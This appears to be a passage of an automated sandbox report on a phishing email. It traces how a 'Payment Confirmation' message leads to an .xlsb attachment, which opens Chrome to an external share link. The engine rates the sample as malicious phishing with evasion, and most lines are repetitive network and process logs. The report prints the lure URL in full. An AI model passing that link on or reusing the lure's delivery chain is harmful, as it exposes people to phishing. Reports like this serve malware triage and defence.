            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
            Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.18:49874 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.18:49892 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.141:443 -> 192.168.2.18:49893 version: TLS 1.2
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: classification engineClassification label: mal92.phis.evad.winMSG@26/148@53/22
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241106T1054420461-3112.etlJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Payment Confirmation (237 KB).msg"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "6E799949-CC68-4C7D-ACF7-DFDB99ECC467" "1E1CE2FA-2E8B-476D-B466-DDE64F014E37" "3112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LF0A6GI2\Payment Copy.xlsb"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" /Embedding
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1860,i,6018047205410846205,15210405168536307558,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "6E799949-CC68-4C7D-ACF7-DFDB99ECC467" "1E1CE2FA-2E8B-476D-B466-DDE64F014E37" "3112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LF0A6GI2\Payment Copy.xlsb"Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" /EmbeddingJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1860,i,6018047205410846205,15210405168536307558,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
            Source: Google Drive.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
